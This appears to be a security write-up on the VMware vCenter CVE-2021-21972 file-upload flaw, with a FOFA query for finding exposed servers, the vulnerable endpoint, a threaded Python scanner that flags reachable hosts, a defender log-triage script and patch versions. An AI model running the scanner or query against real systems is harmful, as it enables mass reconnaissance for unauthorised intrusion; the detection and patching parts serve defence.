About the VMware vcenter unauthorized arbitrary file upload vulnerability (CVE-2021-21972)

Background

CVE-2021-21972 is an unauthenticated remote code execution vulnerability in VMware vCenter Server. Through the vROps plugin upload endpoint, an attacker who can reach the vSphere Client (HTML5) port can write a webshell to an arbitrary location on the vCenter server and then execute it.

Affected versions

vmware:esxi:7.0/6.7/6.5
vmware:vcenter_server:7.0/6.7/6.5

Vulnerability reproduction: FOFA query

Syntax: title="+ ID_VC_Welcome +"

PoC

https://xxxx/ui/vropspluginui/rest/services/uploadova

The script from https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC can be used for batch verification. It only sends an unauthenticated GET to the upload endpoint and treats a 405 (Method Not Allowed) response as a sign that the plugin endpoint is exposed:

#-*- coding:utf-8 -*-
import argparse
import http.client
import random

import requests
import threadpool  # third-party module: pip install threadpool
import urllib3

banner = """
    888888ba dP           
    88 `8b 88           
    a88aaaa8P' .d8888b. d8888P .d8888b. dP dP 
    88 `8b. 88' `88 88 Y8ooooo. 88 88 
    88 .88 88. .88 88 88 88. .88 
    88888888P `88888P8 dP `88888P' `88888P' 
  ooooooooooooooooooooooooooooooooooooooooooooooooooooo 
        @time:2021/02/24 CVE-2021-21972.py
        C0de by NebulabdSec - @batsu         
 """
print(banner)

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Force the fingerprinting request to be sent as HTTP/1.0
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"

def get_ua():
  """Build a random Chrome-style User-Agent string."""
  first_num = random.randint(55, 62)
  third_num = random.randint(0, 3200)
  fourth_num = random.randint(0, 140)
  os_type = [
    '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
    '(Macintosh; Intel Mac OS X 10_12_6)'
  ]
  chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

  ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
          '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
         )
  return ua

def CVE_2021_21972(url):
  """Check one target: an unauthenticated GET to the vROps plugin upload endpoint
  that answers 405 is reported as vulnerable and appended to the result file."""
  # The original had proxies = {"scoks5": ...}; requests keys proxies by URL scheme,
  # so that entry was never used. Set e.g. {"https": "socks5://127.0.0.1:1081"} if needed.
  proxies = None
  headers = {
    'User-Agent': get_ua(),
    "Content-Type": "application/x-www-form-urlencoded"
  }
  targetUrl = url + TARGET_URI
  try:
    res = requests.get(targetUrl,
              headers=headers,
              timeout=15,
              verify=False,
              proxies=proxies)
    if res.status_code == 405:
      print("[+] URL:{}--------CVE-2021-21972 vulnerability exists".format(url))
      with open("vulnerability address.txt", 'a') as fw:
        fw.write(url + '\n')
    else:
      print("[-] " + url + " No CVE-2021-21972 vulnerability was found.\n")
  except requests.RequestException as e:
    print("[-] " + url + " Request ERROR: " + str(e) + "\n")

def multithreading(filename, pools=5):
  """Read one URL per line from filename and check them with a thread pool."""
  works = []
  with open(filename, "r") as f:
    for i in f:
      func_params = [i.rstrip("\n")]
      works.append((func_params, None))
  pool = threadpool.ThreadPool(pools)
  reqs = threadpool.makeRequests(CVE_2021_21972, works)
  for req in reqs:
    pool.putRequest(req)
  pool.wait()

def main():
  parser = argparse.ArgumentParser()
  parser.add_argument("-u",
            "--url",
            help="Target URL; Example:http://ip:port")
  parser.add_argument("-f",
            "--file",
            help="Url File; Example:url.txt")
  args = parser.parse_args()
  url = args.url
  file_path = args.file
  if url is not None and file_path is None:
    CVE_2021_21972(url)
  elif url is None and file_path is not None:
    multithreading(file_path, 10)  # 10 worker threads
  else:
    parser.print_help()

if __name__ == "__main__":
  main()

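As a defender-side complement to the scanner above (an added example, not from the post or the linked repository): a small triage script that flags requests to the uploadova endpoint in a web access log. The combined log format, the regex and the sample lines are constructed assumptions; adapt the pattern to whatever front end writes your vCenter access logs.

```python
import re
from collections import Counter

# Endpoint abused by CVE-2021-21972 (path taken from the page). The real upload
# is a POST to it; the scanner above only sends a GET and treats a 405 as "vulnerable".
UPLOADOVA_PATH = "/ui/vropspluginui/rest/services/uploadova"

# Assumed combined log format: ip ident user [ts] "METHOD path proto" status bytes
# "referer" "user-agent". Adjust if your log source differs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

# Constructed sample lines: a scanner probe, a successful upload, an unrelated
# request and a failed upload attempt.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Feb/2021:10:01:02 +0000] "GET /ui/vropspluginui/rest/services/uploadova HTTP/1.0" 405 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.1234.12 Safari/537.36"
203.0.113.7 - - [24/Feb/2021:10:01:05 +0000] "POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 200 23 "-" "python-requests/2.25.1"
198.51.100.4 - - [24/Feb/2021:10:02:00 +0000] "GET /ui/login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.9 - - [24/Feb/2021:10:03:10 +0000] "POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 500 0 "-" "curl/7.68.0"
"""

def classify(line):
    """Return (verdict, fields). verdict is 'scan', 'upload_attempt',
    'upload_success' or None for lines that do not touch the endpoint."""
    m = LOG_RE.match(line)
    if not m:
        return None, None
    f = m.groupdict()
    if f["path"].split("?", 1)[0].rstrip("/") != UPLOADOVA_PATH:
        return None, f
    if f["method"] == "POST":
        # A 2xx on a POST means a file was accepted: treat it as a compromise indicator
        return ("upload_success" if int(f["status"]) < 300 else "upload_attempt"), f
    # GET and other verbs cannot upload; they are endpoint fingerprinting (the PoC expects 405)
    return "scan", f

def triage(lines):
    """Count verdicts per source IP so the worst offenders surface first."""
    findings = {}
    for line in lines:
        verdict, f = classify(line)
        if verdict:
            findings.setdefault(f["ip"], Counter())[verdict] += 1
    return findings

if __name__ == "__main__":
    for ip, counts in triage(SAMPLE_LOG.splitlines()).items():
        flag = "CRITICAL" if counts["upload_success"] else "suspicious"
        print(f"{ip}: {dict(counts)} -> {flag}")
```

A source that first probes with a GET (HTTP/1.0, browser-like User-Agent, as the script above does) and then POSTs to the same path is the pattern to escalate on; a 2xx on that POST warrants a search of the vCenter filesystem for newly written files.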

Repair suggestions

Upgrade vCenter Server 7.0 to 7.0 U1c
Upgrade vCenter Server 6.7 to 6.7 U3l
Upgrade vCenter Server 6.5 to 6.5 U3n
